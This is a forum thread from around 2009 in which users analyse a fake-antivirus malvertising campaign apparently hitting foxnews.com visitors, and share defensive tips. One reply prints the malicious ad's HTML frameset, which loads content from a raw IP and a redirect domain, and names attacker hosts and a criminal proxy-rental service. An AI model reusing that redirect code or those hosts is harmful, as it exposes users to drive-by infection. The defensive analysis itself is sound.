dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
56645
share rss forum feed


JsMOM

@rr.com
reply to moonpuppy

Re: foxnews.com infected?

I unfortunately had to ask my entire company to stop visiting FOXNEWS. We will probably end up blacklisting it today via OpenDNS. FOXNEWS better make this a huge priority as I'm certain we are not the first, nor will be the last company to do so. Vundo, Bloodhound, etc all have been blocked by Symantec AV, however others have crept in and Malewarebyte's AM was used in safemode as well as Symantec AV to scrub the little PITA's out.

Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide.


evergreek
Boeing Rocks

join:2003-05-25
Hialeah, FL
reply to moonpuppy
I received the same pop up yesterday! Scanned my pc, everything seems ok.
Expand your moderator at work

Bobby_Peru
Premium
join:2003-06-16
reply to JsMOM

Re: foxnews.com infected?

said by JsMOM :

Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide.
Once upon a time, pre Adblock (in it's actual block calling and downloading iteration), WebWasher had an application for central deployment that you might want to check out. Just a thought.


HowDoesItWork

@dhcp.inet.fi
reply to mysec
So how does this infection work and is it really such a big deal? How does it actually infect your system?

Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or ks this a problem just for that mass of people who run with unpatched IE under admin account...

Thanks.

katarina2

join:2003-09-07
Houston, TX
said by HowDoesItWork :

If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all?
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.

Not everyone knows to use Task Manager or other methods to get out of its grasp.

moonpuppy

join:2000-08-21
Glen Burnie, MD
reply to HowDoesItWork
said by HowDoesItWork :

So how does this infection work and is it really such a big deal? How does it actually infect your system?

Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or ks this a problem just for that mass of people who run with unpatched IE under admin account...

Thanks.
I thought my system was fully patched.

I will say that I did NOT initiate any download and I NEVER click on pop-ups or any ads. In fact, IF I see something I like, I will manually copy the link and Google it first.


HowDoesItWork

@dhcp.inet.fi
reply to katarina2
quote:
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.

Not everyone knows to use Task Manager or other methods to get out of its grasp.
Shouldn't the browser still display a download dialog prompt, even if the popup is set to download anyway when you click on anything, including the no thanks button? Seems to me that it should, unless there's a serious flaw in the browser that makes it possible to download stuff without the user accepting the download. I mean, even if you click yes on the crapware popup, shouldn't there still be a download prompt from the browser, unless the browser is just insecure by design? Like this:

- you get served with the infected ad and popup
- you realize what's up and click on the X mark to close the popup
- the popup still tries to push the download on you
- your browser should alert you now that someone wants you to download something, and ask if you want to download the file, download and run it, or to just cancel the whole download

If it does work that way, then it's no threat to those who practice basic safe surfing. But I just don't know how this one works.

To moonpuppy, are you saying that you got infected by doing just browsing the site, not accepting any downloads, with a fully patched browser and fully patched plugins (flash, java, the usual)? If so, how does this thing do that? I'm confused.


MR Opus IT

@64.80.119.x
reply to moonpuppy
This is and FYI to all. After I cleaned my users PC and upgraded to the newest version of Symantec End Point Protection. The only thing I did was open IE7, type www.foxnews.com, hit enter and immediately Symantec caught 3 different maleware files coming from the site. I didn't even have a chance to click. I am setting up another PC to test with to see if it was a combination of add-ons and IE7 or just IE7.

Cometcom1

join:2009-04-18
denmark
reply to HowDoesItWork
The actual infection is pretty nicely covered with the existing comments here, but how does this malware actually hide?

The advertising is loaded from the advertising servers, i.e. it might be hosted there or it might be external contents that is injected in an iframe.

There are two ways that the fake av is initiated after this initial advertising loading.

Javascript redirect - done by hacking the server containing the ad and adding or modifying existing script files.

.htaccess redirect - done by hacking the server containing the ad and forcing a redirect based on the referrer. i.e. The ad can be displayed on multiple sites, but only if it is embedded in particular sites, will it trigger a redirect. - This is most often seen on search engine redirects.

amungus
Premium
join:2004-11-26
America
Reviews:
·Cox HSI
·KCH Cable
I am also interested in how it "hides" as well...

Last infection I got on one of my machines (first one in years), was likely due to an iframe. That, or the unlikely chance that an infected gmail "news ticker" (whatever its called above the inbox - which I've disabled since then...) did it.

iframes have also been forbidden in noscript ever since that.

Agree with a post earlier - this is why I have zero qualms about using adblockplus, and especially noscript. Two of the best plugins IMHO.

Was shocked, however, to still get an infection with these two plugins......
iFrames have only been "forbidden" on the one machine I saw the infection on. On others, I've left noscript at its default settings for the most part.

MGD
Premium,MVM
join:2002-07-31
kudos:9

1 recommendation

reply to HowDoesItWork
said by HowDoesItWork :

... Shouldn't the browser still display a download dialog prompt, even if the popup is set to download anyway when you click on anything, including the no thanks button? Seems to me that it should, unless there's a serious flaw in the browser that makes it possible to download stuff without the user accepting the download. ...
Yes, for clarification, If you decline the scan, it will do the fake scan anyway and impose a full screen in your browser. If you then choose "cancel" for the recommended install, it will proceed with the download. The warning that the user will get is from their system alerting them to the dangers of allowing an .exe file to run. They should be able to use their system at that point to block the install. However, prior to that point, "cancel" and "no" means "Yes".

Be aware that as mysec See Profile points out, the initial popup redirect will also avail of the opportunity to look for several available exploits in the users system configuration.

The IP 78.47.132.222 also contains a frame that sources from: >http://redirectclicks.com/?accs=845&tid=338

<html>
 <head>
  <title>Advertisement</title>
 </head>
 <frameset rows="1,*" cols="*">
 <frame src="http://78.47.132.222/a12/index2.php" name="topFrame" scrolling="no" noresize>
<frame src="http://redirectclicks.com/?accs=845&tid=338" name="topFrame" scrilling="no" noresize> </frameset>
</html>
 

redirectclicks.com is associated with multiple malware:
»www.google.com/search?hl=en&q=%2···o.com%22

Redirectclicks.com is hosted once again on Hetzner Online AG (AS24940) at IP 88.198.69.115 [static.88-198-69-115.clients.your-server.de] alongside Traffic-go.com »www.google.com/search?hl=en&q=%2···G=Search

Both of those criminal domains have infected thousands of sites. While the current focus is on the exploitation of foxnews.com. This is a global problem that infects users every where:





Fox needs to quickly identify the responsible advertiser/s and remove and suspend them. You can find victim reports of infection attacks from Fox going back well over a month.

Incidentally, while wading through the cesspools of cyberspace following the trail of toppromooffer.com I bumped into our friend "Cactus" from Moscow. Small world!!

MGD

moonpuppy

join:2000-08-21
Glen Burnie, MD
reply to HowDoesItWork
said by HowDoesItWork :


To moonpuppy, are you saying that you got infected by doing just browsing the site, not accepting any downloads, with a fully patched browser and fully patched plugins (flash, java, the usual)? If so, how does this thing do that? I'm confused.
Fully patched OS, IE, Java, FLASH, etc. I saw multiple popups and I did not click no but the "X" of the window. When I realized what was happening, I immediately shut the laptop down HARD. I pressed the power button until it shut off completely and restarted the system with the wi-fi off. When I saw no activity, I turned the wi-fi back on and immediately headed here to do some cleaning and that's when I found the issues I mentioned earlier. I then posted here about it.

reply to moonpuppy
I'm curious. Not interested in knocking MS, but is this limited to windows? Any reports from mac or linux users? Thnx.


Dude111
An Awesome Dude
Premium
join:2003-08-04
USA
kudos:12
reply to moonpuppy
Well if FOX knows about this and does nothing,they really do suck!!


HowDoesItWork

@dhcp.inet.fi
reply to MGD
quote:
Yes, for clarification, If you decline the scan, it will do the fake scan anyway and impose a full screen in your browser. If you then choose "cancel" for the recommended install, it will proceed with the download. The warning that the user will get is from their system alerting them to the dangers of allowing an .exe file to run. They should be able to use their system at that point to block the install. However, prior to that point, "cancel" and "no" means "Yes".
Now I feel a little stupid, but I still don't understand how it works. It's business as usual that the popup has a bogus cancel button and the X close window button, and it tries to make you download their crapware anyway. But unless the browser does something completely wrong, there should eventually be a download prompt and you should then be able to cancel the whole thing, so it can't infect your system. If this isn't the case with this particular crapware, I would sure like to know how it accomplishes this feat, technically. There are exploits, but unless it uses an unknown, unpatched zero day vulnerability, that shouldn't work against a fully patched browser and plugins...

quote:
Fully patched OS, IE, Java, FLASH, etc. I saw multiple popups and I did not click no but the "X" of the window. When I realized what was happening, I immediately shut the laptop down HARD. I pressed the power button until it shut off completely and restarted the system with the wi-fi off. When I saw no activity, I turned the wi-fi back on and immediately headed here to do some cleaning and that's when I found the issues I mentioned earlier. I then posted here about it.
So it could infect you without requiring any form of consent from the user? Now that is weird. For IE, I wouldn't be surprised, but if Firefox or Opera would do the same, that would be strange. I'm further confused because mysec on the previous page posted that with Opera, it does pop up a download prompt, and if you cancel the download, it can't infect you.

So, is there something in Opera that prevents this thing from insta-infection without any user consent that doesn't exist in IE or even Firefox? Hate to ask that many questions, but I don't understand the technique that this thing could possibly use to infect you instantly without you accepting a download, and then executing that download... aside from unpatched vulnerabilities. I wonder if the people infected by this were running as admin...

Carnivore

join:2003-01-06
reply to moonpuppy
I got this popup last night when I visited foxnews.com with IE8, and the fake virus scan began in a new window.

I forced the browser closed as quickly as I could with task manager, and ran a real scan with AVG 8.5 which appeared to be clean.

Does anyone know if AVG effectively detects this infection, and/or what other steps should be taken to ensure this thing didn't get its tentacles into my system?

moonpuppy

join:2000-08-21
Glen Burnie, MD
reply to HowDoesItWork
said by HowDoesItWork :


So it could infect you without requiring any form of consent from the user? Now that is weird. For IE, I wouldn't be surprised, but if Firefox or Opera would do the same, that would be strange. I'm further confused because mysec on the previous page posted that with Opera, it does pop up a download prompt, and if you cancel the download, it can't infect you.
Part of the infection can be done with PDF documents. Adobe even put out a warning that they wouldn't have a fix for a month.

mysec
Premium
join:2005-11-29
kudos:4

1 edit

1 recommendation

reply to HowDoesItWork
The fake antivirus exploit prompts for a download in IE, Opera, and Firefox because the download is an executable file for which these browsers prompt by default. I showed Opera in a previous post. Here are IE and Firefox:







The other exploits I found are automatically triggered (drive-by download):

IE exploits against the browser as I showed in the previous post.

PDF exploit in Firefox. This is from a previous exploit. Note that it is Acrobat calling out for the trojan and not Firefox:




Note that this is an Acrobat Reader exploit, not a browser exploit. The browser just loads the PDF file. This exploit works in all browsers. Be sure and configure your file types to Prompt for Download, or "Always Ask"

Opera:




Firefox:




----
rich


Airborne29th

join:2008-10-20
Staunton, VA
Has this been cleaned? Ive gone all through foxnews on our test computer to see if our antivirus will catch it, and nothing is coming up.. Either that or its silently being stopped, tried with adblock plus and without, IE and Firefox.


nojava

@acsalaska.net
reply to moonpuppy
Does this malware require java ? No Java = no infection?
Expand your moderator at work

bobince

join:2002-04-19
DE
reply to mysec

Re: foxnews.com infected?

quote:
Be sure and configure your file types to Prompt for Download, or "Always Ask"
You can also disable the plugin for all browsers from Reader's “Edit->Preferences->Internet->Display PDF in browser” option, or use a different PDF reader that doesn't install a plugin. (Who wants to read a PDF stuck inside a browser window anyway?)

As always, if you aren't using a plugin, remove it, and you'll reduce the attack surface of your browser and the number of things you have to worry about keeping updated. Do you really need PDF, Java, QuickTime and Real plugins? Probably not.


HowDoesItWork

@dhcp.inet.fi
reply to mysec
quote:
The fake antivirus exploit prompts for a download in IE, Opera, and Firefox because the download is an executable file for which these browsers prompt by default. I showed Opera in a previous post.
Ok, so there is a download prompt and you get a chance to cancel the whole thing, in those cases where it attempts to make you download an exe file instead of serving a browser or plugin exploit. That is good news.

quote:
The other exploits I found are automatically triggered (drive-by download):

IE exploits against the browser as I showed in the previous post.

PDF exploit in Firefox. This is from a previous exploit. Note that it is Acrobat calling out for the trojan and not Firefox:

Note that this is an Acrobat Reader exploit, not a browser exploit. The browser just loads the PDF file. This exploit works in all browsers. Be sure and configure your file types to Prompt for Download, or "Always Ask"
Ok, so the actual drive-by downloads (no user consent required) of this badware are based on exploits in either the browser or some other related program like PDF viewers, as usual. And the PDF exploits you can stop just by having the browser prompt for download of pdf files instead of opening them in the proper program, or even just by not giving the PDF viewer permission to go online when your firewall prompts for it. Good news, again!

Thanks for all the advice, guys, I think I understand how this thing operates now. If I got it right, this thing is not a threat as long as you
- have your browser set to prompt for download for exes, pdfs etc instead of having the browser run them at once, and cancel any suspicious, unwanted downloads, and
- have a fully patched browser that isn't vulnerable to the browser exploits this thing tries, such as the latest Opera version.

Or in other words, it's a pretty basic baddie. Sounds like I'm good to go, and have nothing to worry about this malware. It should be easy to avoid this thing: just keep the browser patched (and preferably use Opera) and have it set to prompt for downloading stuff, or disable all the pointless plugins we don't need like Adobe Reader etc.

Still, Foxnews should get their ads cleaned right the F now. It's inexcusable for a big outfit like that to serve crapware via ads. I wonder if a popup blocker would help against these things.


08034016
Hallo lisa Aus Amerika
Premium
join:2001-08-31
Byron, GA
reply to kpatz
said by kpatz:
Internet Explorers addon Shockwave Flash vs.3 found to be linking to the FormSpy website hosted at IP address 81.95.109.11 This addon tries to send your private information to attackers IP 72.95.109.11 (Malaysia)
quote:
IP address country: 81.95.109.11
IP address country flag Czech Republic
IP address state: Hlavni Mesto Praha
IP address city: Praha
quote:
IP address 72.95.109.11
IP country code: US
IP address country: flag United States
IP address state: Maine
IP address city: Orono
IP address latitude: 44.879101
IP address longitude: -68.733002
ISP of this IP [?]: Fairpoint Communications
Organization: Fairpoint Communications
--
Visit-
www.liveleak.com/view?i=e32_1231680425

MGD
Premium,MVM
join:2002-07-31
kudos:9
reply to mysec
said by mysec:

....
Note that this is an Acrobat Reader exploit, not a browser exploit. The browser just loads the PDF file. This exploit works in all browsers. Be sure and configure your file types to Prompt for Download, or "Always Ask"
..
----
rich
Great write up !

I was particularily interested in this driveby:

quote:
[Adobe Reader 6.0 from your computer wants to
connect to plathost.ru [78.109.25.217], port 80]

as that location has come to my attention on several occasions.

IP 78.109.25.217

appears to be hosting 3 domains: »whois.domaintools.com/78.109.25.217

1. Nevervhudo.ru »whois.domaintools.com/nevervhudo.ru

2. Socksps.ru »whois.domaintools.com/Socksps.ru

3. Stopgam.cn »whois.domaintools.com/Stopgam.cn

Due to the name, Socksps.ru aroused some curiosity, however, the main page only offers a log in:




If one can overcome that restriction an account holder can purchase the use of compromised machines around the globe to use as a secure proxy:




This may be where some of the compromised victim machines are leveraged for additional income:

The master list of available for rent machines is several pages long:




You can sort the available hijacked machines by country, and then buy access, daily or monthly to mask your true origin for any nefarious purpose:

USA:




UK:




Iran:




Note the banner add for "carding Conference" at cashing.cc:

This may be where the compromised extracted financial data ends up for sale:




It appears that the only way to obtain a log in account in order to use the services of Socksps.ru is to contact ICQ 431278403

Or you can resond directly to his promotion on forum.zloy.org a cyber criminals one stop shop for carding, hacking exploits, money transfers, banking etc.

His translated add posting on the forum.zloy.org for Socksps.ru services is here:



The main zloy.org page is translated here:



MGD


08034016
Hallo lisa Aus Amerika
Premium
join:2001-08-31
Byron, GA
reply to moonpuppy
Easy Fix block the site and Disable Downloading on your PC.

Now when i go to the Site it gives me a Red screen Blocked by Administrator.
--
Visit-
www.liveleak.com/view?i=e32_1231680425


milvos

@123.211.89.x
reply to moonpuppy
I have been reading all this and maybe am no great with virus, adware, spyware etc.

I have been getting this up with the fake virus scan for a few days now. And want to know whether it is something on my computer or whether this is coming from sites I am visiting. When I leave my computer idle for while it seems to come up.

Any help appreciated.


FiOS Dan
Premium
join:2001-07-06
Boynton Beach, FL
reply to Sentinel
said by Sentinel:

...I use a hosts file to block ads as well.
Methinks that's the ticket.
--
Courage is being scared to death but saddling up anyway.
Expand your moderator at work